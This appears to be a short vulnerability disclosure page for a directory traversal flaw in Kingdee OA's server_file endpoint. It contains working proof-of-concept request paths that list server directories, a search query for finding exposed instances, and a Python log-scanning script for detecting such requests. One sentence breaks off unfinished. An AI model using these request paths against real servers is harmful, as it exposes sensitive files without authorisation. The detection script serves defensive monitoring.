Kingdee OA server_file Directory Traversal Vulnerability
Vulnerability Description
The server_file component of Kingdee OA has a directory traversal vulnerability. Attackers can use it to obtain sensitive server information.
Vulnerability Impact
Kingdee OA
Network surveying and mapping
app="Kingdee-EAS"
Vulnerability Reproduction
The login interface is
Vulnerability PoC
/appmonitor/protected/selector/server_file/files?folder=/&suffix=
Windows server
appmonitor/protected/selector/server_file/files?folder=C://&suffix=
Linux server
appmonitor/protected/selector/server_file/files?folder=/&suffix=
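A detection check for the requests listed above, as an added example that is not part of the original post: it scans web access logs for hits on the server_file listing endpoint and reports the requested folder and the response status. The combined log format, the function name and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint named on this page; matched even when a context path precedes it.
ENDPOINT = "/appmonitor/protected/selector/server_file/files"

# Assumed log format: Apache/Nginx "combined". Adjust for your proxy or WAF.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_server_file_listing(lines):
    """Return one dict per request that reaches the server_file listing endpoint."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        # Collapse duplicate slashes and ignore case before comparing the path.
        path = re.sub(r"/+", "/", url.path).lower()
        if not path.endswith(ENDPOINT):
            continue
        # parse_qs percent-decodes values, so folder=%2F and folder=/ look alike.
        query = parse_qs(url.query, keep_blank_values=True)
        folder = query.get("folder", [""])[0]
        hits.append({
            "ip": m["ip"],
            "time": m["ts"],
            "folder": folder,
            "status": int(m["status"]),
            # A 200 suggests a directory listing was returned to the client.
            "served": m["status"] == "200",
        })
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2024:10:01:02 +0000] "GET /appmonitor/protected/selector/server_file/files?folder=%2F&suffix= HTTP/1.1" 200 5120 "-" "curl/8.0"',
    '198.51.100.7 - - [12/Mar/2024:10:01:09 +0000] "GET /appmonitor/protected/selector/server_file/files?folder=C://&suffix= HTTP/1.1" 404 210 "-" "curl/8.0"',
    '203.0.113.20 - - [12/Mar/2024:10:02:00 +0000] "GET /portal/login.jsp HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_server_file_listing(SAMPLE_LOG):
        print(hit)
```

Entries with `served` set to true are the ones to triage first, since the response likely contained a directory listing.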
This post is licensed under CC BY 4.0 by the author.